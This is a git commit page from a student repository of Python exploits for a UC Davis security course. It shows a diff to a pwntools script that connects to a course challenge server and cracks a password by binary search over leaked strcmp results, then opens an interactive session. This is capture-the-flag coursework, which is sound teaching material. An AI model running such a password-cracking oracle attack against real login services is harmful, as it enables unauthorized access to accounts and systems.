ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git
Log | Files | Refs
commit 21c132719de02ba86debc6b7f28bf1c9abd58375
parent 61d11e1892cb90bbcc8f42d883a5cc7ee3e07156
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu, 10 Oct 2019 19:07:28 -0700

Beginning of catch system for repeat passes

Diffstat:

Mthird_flag.py | 33++++++++++++++++++++++++---------


1 file changed, 24 insertions(+), 9 deletions(-)

diff --git a/third_flag.py b/third_flag.py
@@ -1,19 +1,19 @@
 from pwn import *
 
-def str_to_dec(s):
-    num_vals = [(ord(char)-97) for char in s][-1::-1]
+def str_to_dec(s: str) -> int:
+    num_vals = [(ord(char)-97) for char in s][::-1]
     lst = []
     for pos, val in enumerate(num_vals): 
         lst.append(val*(26**pos))
     return sum(lst)
 
-def dec_to_str(num):
+def dec_to_str(num: int, max: str = 19) -> str:
     st = ""
-    for i in range(19,0,-1):
-        digit = int(num/(26**i)) if int(num/(26**i)) <= 25 else 25
+    for a in range(max,0,-1):
+        digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
         char = chr(digit+97)
         st += char
-        num -= digit*(26**i)
+        num -= digit*(26**a)
     char = chr(int(num)+97)
     st += char  
     return st
@@ -22,18 +22,20 @@ def passgen(low: str, high: str) -> str:
     return dec_to_str((str_to_dec(low)+str_to_dec(high))/2)
 
 cracked = False
+len_limit = False
 attempt = 1
 LO = "aaaaaaaaaaaaaaaaaaaa"
 HI = "zzzzzzzzzzzzzzzzzzzz"
 password = passgen(LO, HI)
 conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
 print(conn.recv())
-while not cracked:
+while not len_limit and not cracked:
     conn.sendline(password)
     print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI))
     attempt += 1
     response = conn.recvline_contains(b"strcmp")
     print("Server response:\n{}\n".format(response))
+    previous_pass = password
     if b" -1 " in response:
         LO = password
         password = passgen(LO, HI)
@@ -43,4 +45,17 @@ while not cracked:
     else:
         print("Password cracked as: {}".format(password))
         cracked = True
-        conn.interactive()
-\ No newline at end of file
+        conn.interactive()
+    if password is previous_pass:
+        len_limit = True
+start_pos = 0
+for b in range(len(LO)):
+    if LO[b] is HI[b]:
+        start_pos += 1
+    else:
+        break
+pass_buffer = password[:start_pos]
+pass_end = password[start_pos:]
+print(password)
+print(pass_buffer)
+print(pass_end)
+\ No newline at end of file